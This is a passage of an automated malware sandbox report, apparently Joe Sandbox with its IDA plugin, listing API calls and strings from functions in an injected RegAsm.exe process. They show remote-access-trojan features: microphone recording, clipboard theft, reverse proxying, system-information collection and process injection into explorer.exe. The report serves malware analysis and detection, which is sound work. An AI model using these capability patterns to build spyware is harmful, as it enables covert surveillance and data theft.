                                                                                                                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                                                                            • __freea.LIBCMT ref: 00454003
                                                                                                                            • __freea.LIBCMT ref: 0045400F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                            • String ID: \@E
                                                                                                                            • API String ID: 201697637-1814623452
                                                                                                                            • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                                                                                            • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                                                                            • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                                                                                            • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID: \&G$\&G$`&G
                                                                                                                            • API String ID: 269201875-253610517
                                                                                                                            • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                                                                                            • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                                                                            • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                                                                                            • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 65535$udp
                                                                                                                            • API String ID: 0-1267037602
                                                                                                                            • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                                                            • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                                                                            • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                                                            • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                                                                            • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                                                                            • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                                                                            • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                                                                            • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                                                                            • __dosmaperr.LIBCMT ref: 0043A937
                                                                                                                            • _free.LIBCMT ref: 0043A943
                                                                                                                            • _free.LIBCMT ref: 0043A94A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2441525078-0
                                                                                                                            • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                                                                                            • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                                                                            • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                                                                                            • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                                                                            APIs
                                                                                                                            • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                            • GetMessageA.USER32 ref: 0040556F
                                                                                                                            • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                            • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                            • API String ID: 2956720200-749203953
                                                                                                                            • Opcode ID: e8ddf5df02fce4b544027896364a672d6d10575023a457524935311215ed6370
                                                                                                                            • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                                                                            • Opcode Fuzzy Hash: e8ddf5df02fce4b544027896364a672d6d10575023a457524935311215ed6370
                                                                                                                            • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                            • String ID: 0VG$0VG$<$@$Temp
                                                                                                                            • API String ID: 1704390241-2575729100
                                                                                                                            • Opcode ID: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                                                                                            • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                                                                            • Opcode Fuzzy Hash: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                                                                                            • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                                                                            APIs
                                                                                                                            • OpenClipboard.USER32 ref: 00416941
                                                                                                                            • EmptyClipboard.USER32 ref: 0041694F
                                                                                                                            • CloseClipboard.USER32 ref: 00416955
                                                                                                                            • OpenClipboard.USER32 ref: 0041695C
                                                                                                                            • GetClipboardData.USER32 ref: 0041696C
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                                                            • CloseClipboard.USER32 ref: 00416984
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                            • String ID: !D@
                                                                                                                            • API String ID: 2172192267-604454484
                                                                                                                            • Opcode ID: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                                                                                            • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                                                                            • Opcode Fuzzy Hash: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                                                                                            • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 221034970-0
                                                                                                                            • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                                                                            • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                                                                            • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                                                                            • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 100059EA
                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                            • _free.LIBCMT ref: 100059F6
                                                                                                                            • _free.LIBCMT ref: 10005A01
                                                                                                                            • _free.LIBCMT ref: 10005A0C
                                                                                                                            • _free.LIBCMT ref: 10005A17
                                                                                                                            • _free.LIBCMT ref: 10005A22
                                                                                                                            • _free.LIBCMT ref: 10005A2D
                                                                                                                            • _free.LIBCMT ref: 10005A38
                                                                                                                            • _free.LIBCMT ref: 10005A43
                                                                                                                            • _free.LIBCMT ref: 10005A51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00448135
                                                                                                                              • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                                                                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                            • _free.LIBCMT ref: 00448141
                                                                                                                            • _free.LIBCMT ref: 0044814C
                                                                                                                            • _free.LIBCMT ref: 00448157
                                                                                                                            • _free.LIBCMT ref: 00448162
                                                                                                                            • _free.LIBCMT ref: 0044816D
                                                                                                                            • _free.LIBCMT ref: 00448178
                                                                                                                            • _free.LIBCMT ref: 00448183
                                                                                                                            • _free.LIBCMT ref: 0044818E
                                                                                                                            • _free.LIBCMT ref: 0044819C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                            • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                                                                            • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                            • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Eventinet_ntoa
                                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                            • API String ID: 3578746661-3604713145
                                                                                                                            • Opcode ID: f8e92c305a00f1990c0cc000fdcfa8130511e423f58ba3ddf86b94edc66621f7
                                                                                                                            • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                                                                            • Opcode Fuzzy Hash: f8e92c305a00f1990c0cc000fdcfa8130511e423f58ba3ddf86b94edc66621f7
                                                                                                                            • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer
                                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                                            • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                                                            • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                                                                            • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                                                            • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                                                                            APIs
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                                                                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00417521
                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                                            • Opcode ID: af846828ab0fe1e3a4f9df3fbedf315b6b34fe35b51f45d5404fce82014e3f54
                                                                                                                            • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                                                                            • Opcode Fuzzy Hash: af846828ab0fe1e3a4f9df3fbedf315b6b34fe35b51f45d5404fce82014e3f54
                                                                                                                            • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                                                                            • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcess
                                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                            • API String ID: 2050909247-4242073005
                                                                                                                            • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                                                                            • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                                                                            • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                                                                            • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                                                                            APIs
                                                                                                                            • _strftime.LIBCMT ref: 00401D50
                                                                                                                              • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                            • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                            • API String ID: 3809562944-243156785
                                                                                                                            • Opcode ID: 4f9b9045cb0b019b2334cf4f72d0ee825d7ac7ef05b05af99fd66716d43047c4
                                                                                                                            • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                                                                            • Opcode Fuzzy Hash: 4f9b9045cb0b019b2334cf4f72d0ee825d7ac7ef05b05af99fd66716d43047c4
                                                                                                                            • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                                                                            APIs
                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                                                                            • int.LIBCPMT ref: 00410E81
                                                                                                                              • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                                                              • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                            • String ID: ,kG$0kG
                                                                                                                            • API String ID: 3815856325-2015055088
                                                                                                                            • Opcode ID: dd30fbcc444118b08f019d0663a80713b7f65785f937330be09992796588b1c6
                                                                                                                            • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                                                                            • Opcode Fuzzy Hash: dd30fbcc444118b08f019d0663a80713b7f65785f937330be09992796588b1c6
                                                                                                                            • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                            • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                            • waveInStart.WINMM ref: 00401CFE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
